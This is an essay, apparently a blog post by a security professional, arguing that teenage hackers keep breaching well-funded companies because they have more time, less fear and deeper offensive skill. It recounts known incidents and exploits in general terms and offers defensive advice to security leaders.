How the Fuck Did a Teenager Do This?
There's a specific look people get when they find out who did it.
I've watched it happen to people I respect. Senior security leaders, CISOs at companies you've heard of, IR consultants billing more per hour than most people make in a week. They're sitting in a conference room or on a Webex bridge at 2am, the incident is finally contained, and the FBI agent on the line drops the detail nobody was prepared for.
He's sixteen.
The room shifts. The shoulders drop. Somebody laughs the wrong kind of laugh. The CFO who has been white-knuckling a coffee mug for three hours sets it down very, very carefully. A few of the technical folks make eye contact across the table because they already half-knew, but the executives go quiet in a way that takes them a few minutes to come out of.
Sixteen. Or seventeen. Or, in one famous case, a kid living at a Travelodge with an Amazon Fire TV stick because he was on bail and his parents had taken his computer.
The company has spent, let's say, $40 million a year on security. They have a SOC. They have an MDR contract. They have a CISO with a cyber risk program and a board-approved framework and a tabletop schedule and a tooling stack that prints SOC2 reports the way a deli prints receipts. They have done everything the magazines told them to do. And they got dismantled by a child.
This is the part of the post where I'm supposed to act surprised on their behalf. I'm not going to.
I was that kid once. A long time ago, in a life I don't talk about much in public, I was on the other side of one of those phone calls. I won't get into specifics, partly because some of it is still nobody's business, but the shape of the experience is the same shape every generation of these kids has lived inside. I had time. I had no fear. I had nobody telling me what was supposed to be hard. I had a curiosity that didn't know it was rude to ask. And the systems I poked at, designed by adults with mortgages and meetings and quarterly objectives, simply could not survive sustained, unhurried, fearless attention from somebody who didn't know yet what he was supposed to find impossible.
That's the whole secret. It hasn't changed in thirty years. It's just gotten worse.
The story keeps repeating because the conditions keep recreating it
Pull names out of any decade and the through-line is the same.
Mitnick at sixteen. Jonathan James at fifteen, into the Defense Threat Reduction Agency and NASA. Mafiaboy at fifteen, taking down Yahoo, eBay, Amazon, CNN, and Dell in one week in 2000. The TalkTalk kid at seventeen. The Twitter Bitcoin scam in 2020 was a seventeen year old in Tampa who social-engineered his way into the internal admin tools and posted from Obama's account, from Biden's, from Musk's, from Bezos'. Lapsus$, the group that walked into Nvidia, Microsoft, Okta, Samsung, T-Mobile, Uber, and Rockstar Games over an eighteen month tear, was mostly teenagers. The lead, Arion Kurtaj, hit Rockstar with an Amazon Fire TV stick, a hotel TV, and a phone, while on bail, in a Travelodge, because the police had taken his actual computer. He stole the GTA 6 source code with a streaming dongle.
Read that again. Hotel TV. Fire stick. Phone. GTA 6 source code.
These are not the outliers. These are the canonical cases that bubble up to public reporting. For every one of them there are a hundred you'll never hear about, because the company successfully ate the story and the kid quietly went into a diversion program or got hired by a contractor.
When the same pattern keeps showing up, it stops being a coincidence and starts being a property of the system. So let's actually look at the system.
The time asymmetry is unbeatable
A senior security professional at a real company has, on a good day, maybe two hours of uninterrupted focus time. A CISO has zero. Their day is meetings, escalations, the quarterly compliance audit, the new GRC tool the CFO got sold, the board deck, the headcount fight, the vendor pitch, the phishing exercise post-mortem. They are managing. They are not, in any real sense, doing security anymore. They are doing security-adjacent administration.
A motivated fifteen year old has eight, ten, twelve hours a day. Every day. For years. With no meetings. No deliverables. No quarterly review. No standup. No interruptions except their mom asking them to come down for dinner.
This is not a small difference. This is a category difference.
Malcolm Gladwell sold a lot of books on the ten thousand hours rule. The actual research it was based on is more nuanced than the airport hardback version, but the rough idea holds: real expertise in a hard domain takes a stupid amount of unstructured, focused, exploratory time. Time spent failing. Time spent confused. Time spent on side quests that turn out to matter. Cybersecurity offense, real offense, not running a Nessus scan, is a hard domain. It rewards that kind of time the way a forge rewards heat.
Your average enterprise security engineer will not accumulate that time in their career. They are too busy doing the job. The kid will accumulate it before they finish high school.
You cannot compete with that on hours. Nobody can. I couldn't, and I'm a guy whose entire adult professional life has been in this industry. The hours I had at fifteen were better than the hours I have at forty, and there isn't a pile of money on earth that will buy them back.
The fear asymmetry is structural
Adults are afraid of the things they have. Mortgage. Career. Clearance. Family. Reputation. Children on the way. The fear isn't pathological, it's correct. Adults have built lives that can be taken from them, and the awareness of that loss shapes every risk decision they make, including the small risk of trying something that probably won't work.
Teenagers have effectively nothing to lose. The downside of failure is a parent yelling at them. The downside of getting caught, in their head, is a slap on the wrist, because they don't yet believe in the future hard enough for "five years from now, federally" to feel real.
This produces an attacker who will try things a professional simply will not try. Not because the professional doesn't know how, but because the professional has internalized a calculation about which avenues are worth exploring, and that calculation is biased toward the safe and the legible. The kid will burn six weekends on a long shot because what else was he going to do, homework? The kid will keep poking at a thing after the third "this is impossible" because he doesn't have a fourth meeting to get to.
Most of the impressive intrusions of the last decade started with somebody refusing to accept that something was impossible. That refusal is, in a strange way, a privilege of youth.
The skill tree problem
This one is going to make some people angry, but I'm going to say it anyway.
The cybersecurity industry, as it exists today, has bifurcated into two largely separate disciplines, and one of them produces almost no real attackers.
There is the developer-adjacent, deeply technical track. People who write exploits. People who reverse engineer firmware. People who do vulnerability research on browser engines and kernel drivers and bootloaders. People who build offensive tooling. People who can read assembly the way you read English. This track is small. It is geographically concentrated. It is not where most cybersecurity money is.
Then there is the compliance-adjacent, governance-and-tooling track. GRC. SOC analysts. Audit prep. Vendor management. Tool deployment. Policy writing. Risk scoring. This is where the bulk of cybersecurity headcount lives, because this is where the bulk of cybersecurity spend is. It is necessary work. I have done it, I have led teams who do it, I respect the people who do it well. But let me be very direct: a person who has spent eight years writing IR runbooks and tuning a SIEM will, on average, have no fucking idea how an actual modern exploit chain works. They will not be able to write one. They will not be able to read one. They will not be able to recognize one in flight without a vendor's IOC feed telling them what to look for.
This is not their fault. The industry hired them for something else and rewarded them for doing that something else well. But it does mean that when a sixteen year old with three years of unstructured V8 fuzzing time decides to come at their company, the defender's mental model and the attacker's mental model are not in the same universe. They are not even playing the same game.
The kid grew up on offense. He started there. He learned the systems by breaking them. He never had to unlearn the polite, sanctioned, approved-channels view of how computers work, because nobody ever taught it to him. Defense, on the other hand, often grew out of IT. It grew out of patching, hardening, tooling, response. Defense doesn't naturally teach offense. You have to deliberately go get it, on your own time, against your manager's preferences, by reading papers and writing your own crashing programs in a VM at midnight. Most people don't.
So you end up with a defender population whose deepest technical instinct is "did the tool alert" and an attacker population whose deepest technical instinct is "what does this thing do when I feed it something it didn't expect." Those are not equivalent muscles.
How the fuck: the complexity ladder
Let's talk about the exploits that make even seasoned people stop and stare.
NSO's ForcedEntry, the iMessage zero-click that Project Zero wrote up in 2021. The exploit primitive lived inside JBIG2, an image compression format from the nineties that almost nobody on earth still actively cares about, embedded in a PDF, parsed automatically by iMessage before the user ever saw the message. The researchers at NSO built a Turing-complete computational environment inside the JBIG2 stream, using the format's logical operators on its image segments as a kind of crude bytecode, and bootstrapped a script-like execution environment from inside an image parser. From there they pivoted to full code execution. Read that twice. They built a computer inside a picture, used the picture's own decoder as the CPU, and ran an exploit on the computer they built inside the picture. That's not "a clever bug." That's a soul-level commitment to a problem.
BLASTPASS, Apple's emergency patch in 2023, was another iMessage zero-click, this one going through a WebP integer-overflow path that had been quietly riding around in libwebp inside Chrome, Firefox, Edge, Signal, Telegram, 1Password, basically every piece of software you own, and nobody had spotted it until somebody decided to.
Spectre and Meltdown turned the fundamental performance optimization that has made every CPU faster for twenty years into a side channel. The exploit didn't break a piece of software. It broke a piece of physics. It demonstrated that speculative execution, an entire architectural strategy, leaks data through measurable timing differences, and that you could script a website to read kernel memory. From JavaScript. Through the CPU's prediction logic.
Rowhammer flipped bits in memory by reading nearby memory cells fast enough to electrically disturb them. The exploit was, at the silicon level, a property of how DRAM is built.
Stuxnet used four zero-days at the same time, in an era when one zero-day got you a CCC talk and a book deal, and chained them together to walk through air-gapped Iranian centrifuges via USB.
log4shell was a logging library taking attacker-controlled input and obediently going to fetch it from an LDAP server because somebody had built JNDI lookups into the format string handling because, presumably, that seemed reasonable in 2013.
These are real exploits. Some of them came from nation states, some came from crime gangs, some came from individual researchers, and some came from kids who got obsessed enough. The line between those categories is more porous than you'd want it to be. Lapsus$ had teenagers in their group who were, in technical terms, on roughly the same skill curve as junior red team operators at major firms. The Twitter kid, the GTA 6 kid, these are not stupid people who got lucky. These are people who put thousands of hours into a craft, by themselves, before anybody was paying them.
When you look at an exploit like ForcedEntry and you don't write code for a living, your reaction is correctly "how the fuck." It's how the fuck for me too, and I do this for a living. The path from "I want to compromise an iPhone via iMessage" to "I will weaponize a thirty year old image compression format to build a virtual machine inside a picture" is not a path that a mortal can describe in a meeting. It's a path that exists because somebody refused to stop. And the people most likely to refuse to stop, in this world, are the ones who haven't yet learned that some things are supposed to be impossible.
AI is the accelerant nobody wanted to admit
Here is the part nobody at a vendor booth is going to say out loud.
For a teenager who already had time and fearlessness on their side, the last two years have been a steroid injection.
Read a paper they don't fully understand? They can ask an LLM to walk them through it line by line, ask follow-ups, demand examples, request the math at a slower pace. Patch-diff a binary? They can drop the disassembly into a model and have it explain what changed and why. Want to write a fuzzer for a niche file format? They can scaffold one in an afternoon. Don't know shellcode? They can learn the shape of it in a week instead of a year. Can't afford a tutor? They have one, on demand, who will never get tired and never tell their mom.
I'm not making a value judgment about this. AI didn't invent the teenager and it didn't invent the curious kid. But it dramatically lowered the activation energy for the thing those kids were already doing. The floor has come up. The ceiling, for the obsessed ones, has come up too. A motivated sixteen year old in 2026 has access to a research apparatus that a mid-career security engineer in 2010 would have killed for, and they have eight more hours a day to use it.
If you are a defender, and your tooling and process and team have not adapted to a world where the attacker also has these capabilities, and arguably uses them more fluently than you do because they grew up native to them, you are losing time you don't know you're losing.
What this means if you're trying to defend something
I'll be honest about the shape of the answer, because I'm tired of vendors selling people a fantasy.
You are not going to out-skill the obsessed sixteen year old at offense. Not as a CISO. Not as a SOC director. Not as a senior engineer with three kids and a real life. The hours are not there. The risk tolerance is not there. The brain plasticity is, frankly, not there in the way it is at fifteen, and I say that as somebody whose brain still works fine. You are playing a different game, and you need to play it differently.
What you can actually do:
Stop pretending that compliance is security. Compliance is a floor. It is the dullest, most generous floor anyone has ever drawn. Falling through the floor is bad, but standing on the floor doesn't make you safe. It just makes you legal.
Hire people who can actually break things, and pay them. Real offensive talent is rare and expensive and worth it. One person who can read your stack the way an attacker reads your stack is worth fifteen people who can write a policy about it. If your security org has zero people who could write an exploit, you have a gap that no tool will fill, and the kid will find it.
Stop letting your detection strategy be "did the vendor's box light up." The good attacks don't light up the box. The kid at the Travelodge is not going to be in your MDR's threat feed until two months after he's already in. By then he has the source code.
Reduce your attack surface ruthlessly. Every service you expose, every integration you add, every SaaS connector you bolt on, every helpdesk number that can reset MFA over the phone, is a potential entry point that an obsessive seventeen year old is going to spend a Thursday afternoon investigating. Most companies have a hundred more entry points than they need. Cut.
Take social engineering seriously the way you take vulnerability management seriously. Lapsus$ didn't 0-day Okta. They called the helpdesk. They paid employees. They SIM-swapped people. The teenagers got better at this than your enterprise has, and you're still spending more on EDR than on training the helpdesk to refuse weird requests.
And, finally, get over the surprise. The next time the agent on the line says "he's seventeen," nobody in your incident response room should be flinching. It should be the base case. Build for that base case, not for the cinematic image of a Russian colonel in a basement somewhere who, frankly, is also probably a twenty three year old kid who used to be a sixteen year old kid.
A last thought
I'm not writing this as a celebration of the kids. Some of them have caused real harm. Some of them have hurt people, leaked things they shouldn't have leaked, destroyed careers, taken down hospitals and pipelines, made the internet worse for the rest of us. Lapsus$ wasn't cute. The Twitter kid wasn't cute. The hospital ransomware ecosystem, where the muscle is teenage affiliates working off a ransomware-as-a-service panel, isn't cute.
But the surprise that professionals keep getting, that recurring stunned silence when they find out who actually owned them, is, to me, the most dangerous part of this whole story. The surprise is the symptom. The surprise means we still, somewhere deep in the org chart, believe that real attackers look like us, think like us, have the same constraints we have. They don't. They never have. And the gap is widening every year.
I was that kid once. The kids today are better than I was, faster than I was, working with tools I would have given a kidney for. They're not the threat to fear. They're the mirror. They're showing us, every couple of years, that the systems we built are exactly as fragile as a curious teenager with no plans for the weekend says they are.
If that doesn't change how you spend your security budget, nothing will.